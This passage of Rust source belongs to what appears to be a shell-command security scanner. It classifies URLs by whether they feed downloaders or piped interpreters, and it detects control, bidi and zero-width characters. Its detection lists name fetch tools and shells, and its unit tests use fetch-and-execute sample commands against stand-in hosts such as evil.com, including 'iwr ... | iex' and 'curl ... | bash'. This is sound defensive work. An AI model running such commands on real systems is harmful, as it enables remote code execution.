        let ws_after = abs + needle_len == bytes.len()
            || bytes
                .get(abs + needle_len)
                .is_some_and(|b| b.is_ascii_whitespace());
        if ws_before && ws_after {
            return Some(abs);
        }
        from = abs + 1;
    }
}
/// Decides whether URLs in this segment are in a "sink" context — fed to
/// something that fetches or executes them.
///
/// True when the wrapper-resolved command is a known fetching command, a git
/// subcommand that contacts a remote, or an interpreter on the receiving end
/// of a pipe (`… | bash`).
fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
    // Resolve through wrappers exactly once; the previous version repeated
    // the full resolution in the pipe branch below.
    let resolved = resolve_segment_command(segment);
    if let Some(cmd) = resolved.as_ref() {
        if cmd.name == "git" {
            return is_git_sink(cmd.args);
        }
        if is_source_command(&cmd.name) {
            return true;
        }
    }
    if let Some(sep) = &segment.preceding_separator {
        if sep == "|" || sep == "|&" {
            if let Some(cmd) = resolved.as_ref() {
                if is_interpreter(&cmd.name) {
                    return true;
                }
            }
        }
    }
    false
}
/// True for commands that fetch or transfer remote content (downloaders,
/// remote copy tools, container runtimes, package managers, PowerShell web
/// cmdlets, and the tirith-run sink).
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl", "wget", "http", "https", "xh", "fetch", "scp", "rsync",
        "docker", "podman", "nerdctl", "pip", "pip3", "npm", "npx", "yarn",
        "pnpm", "go", "cargo", "iwr", "irm", "invoke-webrequest",
        "invoke-restmethod", "tirith-run",
    ];
    SOURCE_COMMANDS.contains(&cmd)
}
/// A parsed scp/rsync remote operand of the form `[user@]host:path`.
pub struct ScpRemoteSpec {
    // Present only for the `user@host:path` form.
    pub user: Option<String>,
    pub host: String,
    // Path after the colon; empty when no colon followed the host.
    pub path: String,
}
/// Parses an scp/rsync remote operand (`[user@]host:path`).
///
/// Returns `None` for flags, scheme URLs, and things that look like local
/// paths: a `/` directly before the `:` (e.g. `./dir:x`) marks a local
/// path, and for a single-letter host a `C:\…`-style drive path is excluded
/// (backslash after the colon always; forward slash only under
/// PowerShell/cmd, where `C:/…` is a plausible drive path).
pub fn parse_scp_remote_spec(arg: &str, shell: ShellType) -> Option<ScpRemoteSpec> {
    if arg.is_empty() || arg.starts_with('-') || arg.contains("://") {
        return None;
    }
    // `user@host[:path]` form.
    if let Some(at_pos) = arg.find('@') {
        let before_at = &arg[..at_pos];
        let after_at = &arg[at_pos + 1..];
        // A colon before the `@` means this is not a user name.
        if before_at.is_empty() || after_at.is_empty() || before_at.contains(':') {
            return None;
        }
        let (host, path) = match after_at.find(':') {
            Some(colon_pos) => {
                // `…/:…` — slash before the colon means a local path.
                if colon_pos > 0 && after_at.as_bytes()[colon_pos - 1] == b'/' {
                    return None;
                }
                (
                    &after_at[..colon_pos],
                    after_at[colon_pos + 1..].to_string(),
                )
            }
            None => (after_at, String::new()),
        };
        if !is_valid_scp_host(host) {
            return None;
        }
        return Some(ScpRemoteSpec {
            user: Some(before_at.to_string()),
            host: host.to_string(),
            path,
        });
    }
    // Bare `host:path` form (a colon is required here).
    let colon_pos = arg.find(':')?;
    if colon_pos > 0 && arg.as_bytes()[colon_pos - 1] == b'/' {
        return None;
    }
    let host = &arg[..colon_pos];
    let after_colon = &arg[colon_pos + 1..];
    if !is_valid_scp_host(host) {
        return None;
    }
    // Single-letter host: guard against Windows drive paths.
    if host.len() == 1 && host.chars().next().unwrap().is_ascii_alphabetic() {
        let first_after = after_colon.chars().next();
        match first_after {
            Some('\\') => return None,
            Some('/') if matches!(shell, ShellType::PowerShell | ShellType::Cmd) => {
                return None;
            }
            _ => {}
        }
    }
    Some(ScpRemoteSpec {
        user: None,
        host: host.to_string(),
        path: after_colon.to_string(),
    })
}
/// True when `host` is a plausible scp host: non-empty and made entirely of
/// ASCII alphanumerics, dots, underscores, and hyphens (which also rules
/// out `/` and `:`).
fn is_valid_scp_host(host: &str) -> bool {
    if host.is_empty() {
        return false;
    }
    host.chars()
        .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
}
/// True when the first non-flag git argument is a subcommand that contacts
/// a remote (clone/fetch/pull/submodule/remote).
fn is_git_sink(args: &[String]) -> bool {
    args.iter()
        .map(|arg| strip_quotes(arg))
        .find(|clean| !clean.starts_with('-'))
        .is_some_and(|sub| {
            matches!(
                sub.as_str(),
                "clone" | "fetch" | "pull" | "submodule" | "remote"
            )
        })
}
/// True for commands that execute whatever is piped into them (shells,
/// scripting language interpreters, PowerShell's Invoke-Expression).
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh", "bash", "zsh", "dash", "ksh", "python", "python3", "node",
        "perl", "ruby", "php", "iex", "invoke-expression",
    ];
    INTERPRETERS.contains(&cmd)
}
/// True when `args[arg_index]` is the value of an output-file or credential
/// flag (for curl/wget/httpie-style commands) rather than a URL candidate.
fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
    let cmd_lower = cmd.to_lowercase();
    let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
    // Per command: flags whose *next* argument is a value, `--flag=` inline
    // forms, and an optional short flag that takes an attached value.
    let (prev_flags, inline_prefixes, attached_short): (&[&str], &[&str], Option<&str>) =
        match cmd_base {
            "curl" => (
                &["-o", "--output", "-u", "--user", "-U", "--proxy-user"],
                &["--output=", "--user=", "--proxy-user="],
                Some("-o"),
            ),
            "wget" => (
                &[
                    "-O",
                    "--output-document",
                    "--user",
                    "--password",
                    "--http-user",
                    "--http-password",
                    "--ftp-user",
                    "--ftp-password",
                    "--proxy-user",
                    "--proxy-password",
                ],
                &[
                    "--output-document=",
                    "--user=",
                    "--password=",
                    "--http-user=",
                    "--http-password=",
                    "--ftp-user=",
                    "--ftp-password=",
                    "--proxy-user=",
                    "--proxy-password=",
                ],
                Some("-O"),
            ),
            "http" | "https" | "xh" => (&["-a", "--auth"], &["--auth="], None),
            _ => return false,
        };
    if arg_index > 0 {
        let prev = strip_quotes(&args[arg_index - 1]);
        if prev_flags.contains(&prev.as_str()) {
            return true;
        }
    }
    let current = strip_quotes(&args[arg_index]);
    // Attached short form, e.g. `-ofile` / `-Ofile`.
    if let Some(short) = attached_short {
        if current.starts_with(short) && current.len() > 2 && !current.starts_with("--") {
            return true;
        }
    }
    inline_prefixes.iter().any(|p| current.starts_with(p))
}
/// Trims surrounding whitespace and removes one matching pair of single or
/// double quotes, if the trimmed string is fully wrapped in them.
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    let wrapped = trimmed.len() >= 2
        && ['"', '\'']
            .iter()
            .any(|&q| trimmed.starts_with(q) && trimmed.ends_with(q));
    if wrapped {
        trimmed[1..trimmed.len() - 1].to_string()
    } else {
        trimmed.to_string()
    }
}
/// Heuristic: does `s` look like a bare `host.tld[/path]` with no scheme?
///
/// Rejects flags, dot-prefixed names, hosts containing spaces, and — when
/// there is no meaningful path — tokens that end in a common file
/// extension (those are almost certainly local filenames, not hosts).
/// Finally requires an alphabetic TLD of 2-63 characters.
fn looks_like_schemeless_host(s: &str) -> bool {
    const FILE_EXTENSIONS: &[&str] = &[
        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h",
        ".txt", ".md", ".json", ".yaml", ".yml", ".xml", ".html", ".css",
        ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip", ".gz", ".bz2",
        ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so",
        ".log", ".conf", ".cfg", ".ini", ".toml", ".png", ".jpg", ".jpeg",
        ".gif", ".bmp", ".ico", ".tiff", ".tif", ".pdf", ".csv", ".mp3",
        ".mp4", ".wav", ".avi", ".mkv", ".flac", ".ogg", ".webm", ".ttf",
        ".otf", ".woff", ".woff2", ".docx", ".xlsx", ".pptx", ".sqlite",
        ".lock", ".example", ".local", ".bak", ".tmp", ".swp", ".orig",
        ".patch", ".diff", ".map", ".env", ".sample", ".dist",
        ".editorconfig",
    ];
    if s.starts_with('-') || s.starts_with('.') || !s.contains('.') {
        return false;
    }
    let host_part = s.split('/').next().unwrap_or(s);
    if !host_part.contains('.') || host_part.contains(' ') {
        return false;
    }
    // "Meaningful path": something non-empty after the first slash that is
    // not just another slash.
    let has_meaningful_path = match s.find('/') {
        Some(idx) => {
            let after_slash = &s[idx + 1..];
            !after_slash.is_empty() && after_slash != "/"
        }
        None => false,
    };
    if !has_meaningful_path {
        let host_lower = host_part.to_lowercase();
        if FILE_EXTENSIONS.iter().any(|ext| host_lower.ends_with(ext)) {
            return false;
        }
    }
    match host_part.rsplit('.').next() {
        Some(tld) => {
            (2..=63).contains(&tld.len()) && tld.chars().all(|c| c.is_ascii_alphabetic())
        }
        None => false,
    }
}
/// Host portion of a schemeless `host/path` string (everything before the
/// first slash, or the whole string).
fn extract_host_from_schemeless(s: &str) -> String {
    match s.split_once('/') {
        Some((host, _)) => host.to_string(),
        None => s.to_string(),
    }
}
/// Path portion of a schemeless `host/path` string, including the leading
/// slash; empty when there is no slash.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map_or_else(String::new, |idx| s[idx..].to_string())
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_tier1_exec_matches_url() {
assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_no_match_simple() {
assert!(!tier1_scan("ls -la", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_no_match_echo() {
assert!(!tier1_scan("echo hello world", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_bash() {
assert!(tier1_scan("something | bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_sudo_bash() {
assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_env_bash() {
assert!(tier1_scan("something | env bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_bin_bash() {
assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_git_scp() {
assert!(tier1_scan(
"git clone git@github.com:user/repo",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_punycode() {
assert!(tier1_scan(
"curl https://xn--example-cua.com",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_docker() {
assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_iwr() {
assert!(tier1_scan(
"iwr https://evil.com/script.ps1",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_curl() {
assert!(tier1_scan(
"curl https://example.com/install.sh",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_lookalike_tld() {
assert!(tier1_scan("open file.zip", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_shortener() {
assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
}
#[test]
fn test_tier1_paste_matches_non_ascii() {
assert!(tier1_scan("café", ScanContext::Paste));
}
#[test]
fn test_tier1_paste_exec_patterns_also_match() {
assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
}
#[test]
fn test_tier1_exec_no_non_ascii() {
assert!(!tier1_scan("echo café", ScanContext::Exec));
}
#[test]
fn test_byte_scan_ansi() {
let input = b"hello \x1b[31mred\x1b[0m world";
let result = scan_bytes(input);
assert!(result.has_ansi_escapes);
}
#[test]
fn test_byte_scan_control_chars() {
let input = b"hello\rworld";
let result = scan_bytes(input);
assert!(result.has_control_chars);
}
#[test]
fn test_byte_scan_bidi() {
let input = "hello\u{202E}dlrow".as_bytes();
let result = scan_bytes(input);
assert!(result.has_bidi_controls);
}
#[test]
fn test_byte_scan_zero_width() {
let input = "hel\u{200B}lo".as_bytes();
let result = scan_bytes(input);
assert!(result.has_zero_width);
}
#[test]
fn test_byte_scan_clean() {
let input = b"hello world\n";
let result = scan_bytes(input);
assert!(!result.has_ansi_escapes);
assert!(!result.has_control_chars);
assert!(!result.has_bidi_controls);
assert!(!result.has_zero_width);
}
#[test]
fn test_extract_urls_basic() {
let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
assert_eq!(urls.len(), 1);
assert_eq!(urls[0].raw, "https://example.com/install.sh");
}
#[test]
fn test_extract_urls_from_leading_env_assignment() {
let urls = extract_urls(
"PAYLOAD_URL=https://example.com/install.sh curl ok",
ShellType::Posix,
);
assert!(
urls.iter()
.any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
"leading env assignment URL should be extracted in sink context"
);
}
#[test]
fn test_extract_urls_from_quoted_leading_env_assignment() {
let urls = extract_urls(
"PAYLOAD_URL='https://example.com/install.sh' curl ok",
ShellType::Posix,
);
assert!(
urls.iter()
.any(|u| u.raw == "https://example.com/install.sh"),
"quoted leading env assignment URL should be extracted"
);
}
#[test]
fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
let urls = extract_urls(
"HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
ShellType::Posix,
);
assert!(
!urls.iter().any(|u| u.raw == "http://proxy:8080"),
"proxy configuration URLs should not be treated as destinations"
);
}
#[test]
fn test_extract_urls_pipe() {
let urls = extract_urls(
"curl https://example.com/install.sh | bash",
ShellType::Posix,
);
assert!(!urls.is_empty());
assert!(urls[0].in_sink_context);
}
#[test]
fn test_extract_urls_scp() {
let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
assert!(!urls.is_empty());
assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
}
#[test]
fn test_extract_docker_ref() {
let urls = extract_urls("docker pull nginx", ShellType::Posix);
let docker_urls: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
.collect();
assert_eq!(docker_urls.len(), 1);
}
#[test]
fn test_extract_powershell_iwr() {
let urls = extract_urls(
"iwr https://example.com/script.ps1 | iex",
ShellType::PowerShell,
);
assert!(!urls.is_empty());
}
#[test]
fn test_wrapper_preserves_sink_context() {
let urls = extract_urls(
"env --ignore-environment curl http://example.com",
ShellType::Posix,
);
assert!(
urls.iter()
.any(|u| u.raw == "http://example.com" && u.in_sink_context),
"wrapped sink commands should keep sink context"
);
}
#[test]
fn test_env_wrapper_preserves_tirith_run_sink_context() {
    // `env` in front of `tirith run` keeps the URL in sink context.
    let found = extract_urls("env tirith run http://example.com", ShellType::Posix);
    let preserved = found
        .iter()
        .any(|u| u.raw == "http://example.com" && u.in_sink_context);
    assert!(preserved, "env wrapper should preserve tirith run sink context");
}
#[test]
fn test_command_wrapper_preserves_tirith_run_sink_context() {
    // `command` in front of `tirith run` keeps the URL in sink context.
    let found = extract_urls("command tirith run http://example.com", ShellType::Posix);
    let preserved = found
        .iter()
        .any(|u| u.raw == "http://example.com" && u.in_sink_context);
    assert!(preserved, "command wrapper should preserve tirith run sink context");
}
#[test]
fn test_time_wrapper_preserves_tirith_run_sink_context() {
    // `time` in front of `tirith run` keeps the URL in sink context.
    let found = extract_urls("time tirith run http://example.com", ShellType::Posix);
    let preserved = found
        .iter()
        .any(|u| u.raw == "http://example.com" && u.in_sink_context);
    assert!(preserved, "time wrapper should preserve tirith run sink context");
}
#[test]
fn test_strip_quotes_single_char() {
    // A lone quote character has no matching pair and is returned unchanged.
    for quote in ["\"", "'"] {
        assert_eq!(strip_quotes(quote), quote);
    }
}
#[test]
fn test_strip_quotes_empty() {
    // Empty input stays empty.
    assert_eq!(strip_quotes(""), "");
}
#[test]
fn test_scan_bytes_bel_vt_del() {
    // BEL, VT, FF, and DEL embedded mid-string all count as control chars.
    for payload in [
        b"hello\x07world".as_slice(),
        b"hello\x0Bworld",
        b"hello\x0Cworld",
        b"hello\x7Fworld",
    ] {
        assert!(scan_bytes(payload).has_control_chars);
    }
}
#[test]
fn test_scan_bytes_osc_apc_dcs() {
    // OSC (ESC ]), APC (ESC _) and DCS (ESC P) introducers are all
    // treated as ANSI escape sequences.
    for payload in [
        b"hello\x1b]0;title\x07world".as_slice(),
        b"hello\x1b_dataworld",
        b"hello\x1bPdataworld",
    ] {
        assert!(scan_bytes(payload).has_ansi_escapes);
    }
}
#[test]
fn test_schemeless_long_tld() {
    // Long gTLDs such as .academy / .photography still look like hosts.
    for candidate in ["example.academy", "example.photography"] {
        assert!(looks_like_schemeless_host(candidate));
    }
}
#[test]
fn test_segment_index_correct() {
    // Two piped segments: every extracted URL must map to segment 0 or 1.
    let found = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
    assert!(found.iter().all(|u| u.segment_index <= 1));
}
#[test]
fn test_docker_build_context_not_image() {
    // `docker build .` takes a build context path, not an image reference.
    let found = extract_urls("docker build .", ShellType::Posix);
    let docker_refs = found
        .iter()
        .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
        .count();
    assert_eq!(
        docker_refs, 0,
        "build context '.' should not be treated as image"
    );
}
#[test]
fn test_docker_image_subcmd() {
    // The two-word `docker image pull` form also yields one image reference.
    let found = extract_urls("docker image pull nginx", ShellType::Posix);
    let docker_refs = found
        .iter()
        .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
        .count();
    assert_eq!(docker_refs, 1);
}
#[test]
fn test_docker_run_image_after_double_dash() {
    // The image name may follow a `--` terminator; it must still be found.
    let found = extract_urls(
        "docker run --rm -- evil.registry/ns/img:1",
        ShellType::Posix,
    );
    let mut docker_refs = found
        .iter()
        .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }));
    let first = docker_refs.next().expect("expected a docker reference");
    assert_eq!(first.raw, "evil.registry/ns/img:1");
    assert!(docker_refs.next().is_none(), "expected exactly one docker reference");
}
#[test]
fn test_tier1_module_boundary_enforcement() {
    // Generated tier-1 artifacts must be present, internally consistent,
    // and both generated patterns must compile as regexes.
    let extractor_ids = tier1_generated::EXTRACTOR_IDS;
    assert!(!extractor_ids.is_empty(), "EXTRACTOR_IDS must not be empty");
    let n_exec = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
    let n_paste = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
    assert!(n_exec > 0, "Must have exec fragments");
    assert!(
        n_paste >= n_exec,
        "Paste fragments must be superset of exec fragments"
    );
    // Compile both generated patterns to prove they are valid regex sources.
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
        .expect("Generated exec pattern must be valid regex");
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
        .expect("Generated paste pattern must be valid regex");
}
#[test]
fn test_scan_bytes_trailing_cr_not_flagged() {
    // A single \r at end of input is benign (e.g. pasted Windows text).
    let flagged = scan_bytes(b"/path\r").has_control_chars;
    assert!(!flagged, "trailing \\r should not be flagged");
}
#[test]
fn test_scan_bytes_trailing_crlf_not_flagged() {
    // A trailing \r\n pair is an ordinary Windows line ending.
    let flagged = scan_bytes(b"/path\r\n").has_control_chars;
    assert!(!flagged, "trailing \\r\\n should not be flagged");
}
#[test]
fn test_scan_bytes_windows_multiline_not_flagged() {
    // Multiple \r\n-terminated lines are still plain Windows text.
    let flagged = scan_bytes(b"line1\r\nline2\r\n").has_control_chars;
    assert!(!flagged, "Windows \\r\\n line endings should not be flagged");
}
#[test]
fn test_scan_bytes_embedded_cr_still_flagged() {
    // A \r not followed by \n can be used to visually overwrite output.
    let flagged = scan_bytes(b"safe\rmalicious").has_control_chars;
    assert!(flagged, "embedded \\r before non-\\n should be flagged");
}
#[test]
fn test_scan_bytes_mixed_crlf_and_attack_cr() {
    // A lone attack \r must be caught even when legitimate \r\n pairs exist.
    let flagged = scan_bytes(b"line1\r\nfake\roverwrite\r\n").has_control_chars;
    assert!(flagged, "attack \\r mixed with \\r\\n should be flagged");
}
#[test]
fn test_scan_bytes_only_cr() {
    // Input consisting of just \r is a trailing CR, hence benign.
    let flagged = scan_bytes(b"\r").has_control_chars;
    assert!(!flagged, "lone trailing \\r should not be flagged");
}
#[test]
fn test_schemeless_skip_curl_output_flag() {
    // The argument to curl's -o names a local file, not a host.
    let found = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
    let schemeless_hit = found
        .iter()
        .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }));
    assert!(
        !schemeless_hit,
        "lenna.png should not be detected as schemeless URL"
    );
}
#[test]
fn test_schemeless_skip_curl_output_combined() {
    // The combined form -olenna.png is likewise an output filename.
    let found = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
    let schemeless_hit = found
        .iter()
        .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }));
    assert!(
        !schemeless_hit,
        "-olenna.png should not be detected as schemeless URL"
    );
}
#[test]
fn test_schemeless_skip_wget_output_flag() {
    // wget's -O argument is a local output file, not a host.
    let found = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
    let schemeless_hit = found
        .iter()
        .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }));
    assert!(
        !schemeless_hit,
        "output.html should not be detected as schemeless URL"
    );
}
#[test]
fn test_schemeless_skip_wget_combined() {
    // The combined form -Ooutput.html is likewise an output filename.
    let found = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
    let schemeless_hit = found
        .iter()
        .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }));
    assert!(
        !schemeless_hit,
        "-Ooutput.html should not be detected as schemeless URL"
    );
}
#[test]
fn test_schemeless_real_domain_still_detected() {
    // Skipping output-flag arguments must not hide real schemeless domains.
    let found = extract_urls("curl evil.com/payload", ShellType::Posix);
    let schemeless_hit = found
        .iter()
        .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }));
    assert!(
        schemeless_hit,
        "evil.com/payload should be detected as schemeless URL"
    );
}
#[test]
fn test_schemeless_user_at_host_detected_in_sink_context() {
    // user@host handed to curl is a destination, not an scp target.
    let found = extract_urls("curl user@bit.ly", ShellType::Posix);
    let mut hits = found
        .iter()
        .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }));
    let first = hits.next().expect("expected one schemeless URL");
    assert_eq!(first.raw, "user@bit.ly");
    assert!(hits.next().is_none(), "expected exactly one schemeless URL");
}
#[test]
fn test_scp_user_at_host_not_treated_as_schemeless_url() {
    // In an scp command, user@host is a remote spec, not a schemeless URL.
    let found = extract_urls("scp user@server.com file.txt", ShellType::Posix);
    let schemeless_hit = found
        .iter()
        .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }));
    assert!(!schemeless_hit);
}
fn scp_has_schemeless(cmd: &str, shell: ShellType) -> bool {
    // Test helper: true when any URL extracted from `cmd` parsed as a
    // schemeless host/path.
    let found = extract_urls(cmd, shell);
    found
        .iter()
        .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
}
#[test]
fn test_scp_plain_host_path_not_schemeless() {
    // host:/absolute/path in scp is a remote spec, not a schemeless URL.
    let hit = scp_has_schemeless("scp test.asdf testhost:/home/user/", ShellType::Posix);
    assert!(!hit);
}
#[test]
fn test_scp_plain_host_relative_path_not_schemeless() {
    // host:relative/path in scp is likewise a remote spec.
    let hit = scp_has_schemeless("scp file.txt host:dir/", ShellType::Posix);
    assert!(!hit);
}
#[test]
fn test_rsync_plain_host_path_not_schemeless() {
    // rsync destinations use the same host:path remote-spec form.
    let hit = scp_has_schemeless("rsync -av src host:/dest/", ShellType::Posix);
    assert!(!hit);
}
#[test]
fn test_scp_one_letter_alias_posix_accepted() {
    // A one-letter ssh host alias is a valid remote spec on POSIX shells.
    let hit = scp_has_schemeless("scp file x:/tmp/", ShellType::Posix);
    assert!(!hit);
}
#[test]
fn test_scp_windows_backslash_always_rejected() {
    // A backslash path is a Windows drive path in every shell — never a
    // remote spec.
    for shell in [ShellType::Posix, ShellType::PowerShell, ShellType::Cmd] {
        assert!(parse_scp_remote_spec("C:\\Users\\me\\file", shell).is_none());
    }
    assert!(parse_scp_remote_spec("D:\\backup", ShellType::Posix).is_none());
}
#[test]
fn test_scp_windows_forward_slash_shell_scoped() {
    // C:/... reads as a local drive path on Windows-native shells only;
    // POSIX-like shells may treat it as host "C" plus a path.
    for shell in [ShellType::PowerShell, ShellType::Cmd] {
        assert!(parse_scp_remote_spec("C:/Users/me/file", shell).is_none());
    }
    for shell in [ShellType::Posix, ShellType::Fish] {
        assert!(parse_scp_remote_spec("C:/Users/me/file", shell).is_some());
    }
}
#[test]
fn test_scp_windows_ambiguous_drive_letter_accepted() {
    // Drive-letter-like specs with no slash directly after ':' remain
    // ambiguous and are accepted as remote specs in every shell.
    let all_shells = [
        ShellType::Posix,
        ShellType::Fish,
        ShellType::PowerShell,
        ShellType::Cmd,
    ];
    for shell in all_shells {
        for spec in ["C:foo", "D:backup/x.txt"] {
            assert!(
                parse_scp_remote_spec(spec, shell).is_some(),
                "{spec} should parse as remote in shell {shell:?}"
            );
        }
    }
}
#[test]
fn test_scp_rejects_url_scheme() {
    // Anything carrying an explicit URL scheme is not an scp remote spec.
    for spec in ["http://evil.com/a.sh", "https://a.b/c"] {
        assert!(parse_scp_remote_spec(spec, ShellType::Posix).is_none());
    }
}
#[test]
fn test_scp_rejects_flag_and_absolute_local() {
    // Command-line flags and absolute local paths are never remote specs.
    for spec in ["-P", "--port=22", "/tmp:weird"] {
        assert!(parse_scp_remote_spec(spec, ShellType::Posix).is_none());
    }
}
#[test]
fn test_scp_accepts_user_at_host_forms() {
    // user@host:path with relative and absolute paths both parse.
    for spec in ["user@server.com:file.txt", "user@host:/path"] {
        assert!(parse_scp_remote_spec(spec, ShellType::Posix).is_some());
    }
}
#[test]
fn test_scp_rejects_missing_parts() {
    // Specs missing a required component are invalid: empty input,
    // empty host before ':', empty user before '@', and empty host
    // between '@' and ':'.
    assert!(parse_scp_remote_spec("", ShellType::Posix).is_none());
    assert!(parse_scp_remote_spec(":path", ShellType::Posix).is_none());
    assert!(parse_scp_remote_spec("@host:path", ShellType::Posix).is_none());
    assert!(parse_scp_remote_spec("user@:path", ShellType::Posix).is_none());
}
#[test]
fn test_scp_rejects_host_with_slash() {
    // A '/' before the ':' means a local path, never a hostname.
    let parsed = parse_scp_remote_spec("foo/bar:baz", ShellType::Posix);
    assert!(parsed.is_none());
}
#[test]
fn test_parse_scp_remote_spec_fields_populated() {
    // Full user@host:path form splits into all three fields.
    let with_user = parse_scp_remote_spec("user@server.com:/path", ShellType::Posix).unwrap();
    assert_eq!(with_user.user.as_deref(), Some("user"));
    assert_eq!(with_user.host, "server.com");
    assert_eq!(with_user.path, "/path");
    // host:path form leaves the user field unset.
    let no_user = parse_scp_remote_spec("host:/dest/", ShellType::Posix).unwrap();
    assert_eq!(no_user.user, None);
    assert_eq!(no_user.host, "host");
    assert_eq!(no_user.path, "/dest/");
}
#[test]
fn test_schemeless_png_no_slash_is_file() {
    // A bare .png name with no path component reads as a filename.
    assert!(!looks_like_schemeless_host("lenna.png"));
}
#[test]
fn test_schemeless_tld_overlap_with_path_is_domain() {
    // .zip/.sh double as real TLDs; a trailing path tips them to "domain".
    for candidate in ["evil.zip/payload", "evil.sh/payload"] {
        assert!(looks_like_schemeless_host(candidate));
    }
}
#[test]
fn test_schemeless_tld_overlap_without_path_is_file() {
    // Without a path, the same extensions read as ordinary filenames.
    for candidate in ["lenna.zip", "script.sh"] {
        assert!(!looks_like_schemeless_host(candidate));
    }
}
#[test]
fn test_schemeless_tld_overlap_sink_context_detected() {
    // End-to-end: curl of a .zip domain with a path is flagged schemeless.
    let found = extract_urls("curl evil.zip/payload", ShellType::Posix);
    let schemeless_hit = found
        .iter()
        .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }));
    assert!(
        schemeless_hit,
        "evil.zip/payload should be detected as schemeless URL in sink context"
    );
}
}